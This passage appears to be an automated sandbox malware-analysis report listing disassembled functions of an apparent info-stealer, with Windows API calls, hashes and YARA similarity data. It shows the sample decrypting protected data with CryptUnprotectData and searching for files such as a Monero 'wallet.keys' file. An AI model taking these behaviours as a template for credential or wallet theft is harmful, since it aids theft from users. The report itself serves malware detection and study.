                          • Part of subcall function 0087A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0087AA12
                          • Part of subcall function 0087A8A0: lstrcpy.KERNEL32(?,00880E17), ref: 0087A905
                        • CloseHandle.KERNEL32(?), ref: 00878761
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                        • String ID:
                        • API String ID: 1066202413-0
                        • Opcode ID: 99d795aa081f952da4419d6a83eebd56b7260504a438dbdf590fe8dade146704
                        • Instruction ID: e6a7247b2f4171053037571e1bd9af21e4bc44b1d1c706de1f2d714ed24c43ea
                        • Opcode Fuzzy Hash: 99d795aa081f952da4419d6a83eebd56b7260504a438dbdf590fe8dade146704
                        • Instruction Fuzzy Hash: A6315071901118EBCB18DF94CC45FEEB778FB45700F1081A9A51EE2194DB34AA45CFA2
                        Function 00878EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                        Download Yara Rule
                        APIs
                        • CryptBinaryToStringA.CRYPT32(00000000,00865184,40000001,00000000,00000000,?,00865184), ref: 00878EC0
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptString
                        • String ID:
                        • API String ID: 80407269-0
                        • Opcode ID: 88ab0878ef3aaa84ca77a2b39864a3e1288aef8876f8e3a1659ef64afa4c17be
                        • Instruction ID: c5ccdd1730b768b41e12a76f03427213b7a39cb99679b3193ca9882ff03394d5
                        • Opcode Fuzzy Hash: 88ab0878ef3aaa84ca77a2b39864a3e1288aef8876f8e3a1659ef64afa4c17be
                        • Instruction Fuzzy Hash: 03110671240209EFDB00CFA4E888FAA37A9FF8A714F10D448F919CB254DB35E881DB61
                        Function 00869AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                        Download Yara Rule
                        APIs
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00864EEE,00000000,00000000), ref: 00869AEF
                        • LocalAlloc.KERNEL32(00000040,?,?,?,00864EEE,00000000,?), ref: 00869B01
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00864EEE,00000000,00000000), ref: 00869B2A
                        • LocalFree.KERNEL32(?,?,?,?,00864EEE,00000000,?), ref: 00869B3F
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptLocalString$AllocFree
                        • String ID:
                        • API String ID: 4291131564-0
                        • Opcode ID: c6710bc813351d657423686e1f01ec57f63117c05ecd32f8ca7c0303ace06805
                        • Instruction ID: 8a8a88926457c311d95566f1452f08e071a9231b167e1cf2de52f3941c8cea1e
                        • Opcode Fuzzy Hash: c6710bc813351d657423686e1f01ec57f63117c05ecd32f8ca7c0303ace06805
                        • Instruction Fuzzy Hash: FF11A4B4240209AFEB10CFA4DC95FAA77B9FB89B10F208058F9159B3D4C775A901DB50
                        Function 00877980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00880E00,00000000,?), ref: 008779B0
                        • RtlAllocateHeap.NTDLL(00000000), ref: 008779B7
                        • GetLocalTime.KERNEL32(?,?,?,?,?,00880E00,00000000,?), ref: 008779C4
                        • wsprintfA.USER32 ref: 008779F3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                        • String ID:
                        • API String ID: 377395780-0
                        • Opcode ID: 6d042e62e9d68f9fa05de7085366b2c73a492a3f8f8d8847fb739fde4848bf48
                        • Instruction ID: f775cf0ffdaabd9cc9cd0959dd4bab4834ca33ae5565f36a08a482ae164f3d54
                        • Opcode Fuzzy Hash: 6d042e62e9d68f9fa05de7085366b2c73a492a3f8f8d8847fb739fde4848bf48
                        • Instruction Fuzzy Hash: 221115B2904219AACB14DFC9DD45BBEB7F8FB4DB11F10421AF605A2280E3395941CBB1
                        Function 00877A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0116E4C8,00000000,?,00880E10,00000000,?,00000000,00000000), ref: 00877A63
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00877A6A
                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0116E4C8,00000000,?,00880E10,00000000,?,00000000,00000000,?), ref: 00877A7D
                        • wsprintfA.USER32 ref: 00877AB7
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                        • String ID:
                        • API String ID: 3317088062-0
                        • Opcode ID: 79125508ec75bac019dd6d8979735a9cce8ae2a5f1773cc3cbb51b3cd703bb8a
                        • Instruction ID: d28e746ef53af73a73496f24fd29f26f83de2accdcd52e4a968bd29c2d601814
                        • Opcode Fuzzy Hash: 79125508ec75bac019dd6d8979735a9cce8ae2a5f1773cc3cbb51b3cd703bb8a
                        • Instruction Fuzzy Hash: 0F117CB1945228EBEB20CF54DC49FA9B7B8FB05721F1046DAE91AA32D0C7785A40CF91
                        Function 00873720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                        Download Yara Rule
                        APIs
                        • CoCreateInstance.COMBASE(0087E118,00000000,00000001,0087E108,00000000), ref: 00873758
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 008737B0
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharCreateInstanceMultiWide
                        • String ID:
                        • API String ID: 123533781-0
                        • Opcode ID: 3e8a21b5f562d8040f93b1629276958d4e8599fd06896dfdb39d39adaeeaf037
                        • Instruction ID: ceea93911e2f653c3af64640764d1736216fe00dddb1f2bc1d54132554af2583
                        • Opcode Fuzzy Hash: 3e8a21b5f562d8040f93b1629276958d4e8599fd06896dfdb39d39adaeeaf037
                        • Instruction Fuzzy Hash: A941FB70A40A289FDB24DB58CC95B9BB7B4FB48702F4081D8E618E72D0D771AE85CF51
                        Function 00869B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                        Download Yara Rule
                        APIs
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00869B84
                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00869BA3
                        • LocalFree.KERNEL32(?), ref: 00869BD3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$AllocCryptDataFreeUnprotect
                        • String ID:
                        • API String ID: 2068576380-0
                        • Opcode ID: 8cbbd8b792f288ca71d4e728435c7bcb6a74c4059f1ee5b0dd129d883f728ee6
                        • Instruction ID: 60999796f28a51cdb502bd943e9ce309b6390f3e35a396756951e050425fafa1
                        • Opcode Fuzzy Hash: 8cbbd8b792f288ca71d4e728435c7bcb6a74c4059f1ee5b0dd129d883f728ee6
                        • Instruction Fuzzy Hash: 9711CCB4A00209DFDB04DF94D985AAE77F9FF89300F104558E91597390D774AE11CFA1
                        Function 00C380B8 Relevance: 4.1, Strings: 2, Instructions: 1566COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: <4x$Z.sm
                        • API String ID: 0-3651259717
                        • Opcode ID: 383fabea9398a5bd957e534171df4e130885795de81da6c31d6325eb211a13df
                        • Instruction ID: 0ad7a61f1c2476f794d371fbdee36065356f1ef4cea6d024f87061c231467628
                        • Opcode Fuzzy Hash: 383fabea9398a5bd957e534171df4e130885795de81da6c31d6325eb211a13df
                        • Instruction Fuzzy Hash: 16B217F3A0C204AFE3046E29EC8567AF7E9EF94760F16893DE6C483744EA3558058797
                        Function 00B990D6 Relevance: 2.7, Strings: 2, Instructions: 197COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: f#j/$qq?}
                        • API String ID: 0-2737718938
                        • Opcode ID: 46898fa27f32660b7bac63a27112f3826d531c422b7e1dae10e8c15dc43ab1e7
                        • Instruction ID: 613d20a94f9531bec88ac594689c1f6a609d48fefcff346350ad80b71b5ede7e
                        • Opcode Fuzzy Hash: 46898fa27f32660b7bac63a27112f3826d531c422b7e1dae10e8c15dc43ab1e7
                        • Instruction Fuzzy Hash: 2F5123B3A087048FE3106E29CC8537ABBD6EFD4711F2B853DD6C887784EA3959068746
                        Function 0086F68A Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                          • Part of subcall function 0087A920: lstrcpy.KERNEL32(00000000,?), ref: 0087A972
                          • Part of subcall function 0087A920: lstrcat.KERNEL32(00000000), ref: 0087A982
                          • Part of subcall function 0087A9B0: lstrlen.KERNEL32(?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 0087A9C5
                          • Part of subcall function 0087A9B0: lstrcpy.KERNEL32(00000000), ref: 0087AA04
                          • Part of subcall function 0087A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0087AA12
                          • Part of subcall function 0087A8A0: lstrcpy.KERNEL32(?,00880E17), ref: 0087A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008815B8,00880D96), ref: 0086F71E
                        • StrCmpCA.SHLWAPI(?,008815BC), ref: 0086F76F
                        • StrCmpCA.SHLWAPI(?,008815C0), ref: 0086F785
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0086FAB1
                        • FindClose.KERNEL32(000000FF), ref: 0086FAC3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID:
                        • API String ID: 3334442632-0
                        • Opcode ID: 84c4c0165d4302b2349ea7859549a4bdb80ccc2ee8b196465ca76ef865a517b7
                        • Instruction ID: e4d0a8edf3e2105160cd3fc81fb1d68c8c242e9db9be55c3c0f285345674e26d
                        • Opcode Fuzzy Hash: 84c4c0165d4302b2349ea7859549a4bdb80ccc2ee8b196465ca76ef865a517b7
                        • Instruction Fuzzy Hash: 8E1163318001599BDB18EBA4DC959EE7378FB50300F4082A5A52ED6096EF306B4ACB53
                        Function 00BBCE5B Relevance: 1.5, Strings: 1, Instructions: 228COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: rq=
                        • API String ID: 0-3145165390
                        • Opcode ID: a0eca6a029677fc40a0e39b8a8d203a5d0176beecc3a176bae95ff33583d9d7a
                        • Instruction ID: 7ae52fc82c7480d5e288126db2072ea2e4f715df2fce8cb9ac5f7ef27547a7f2
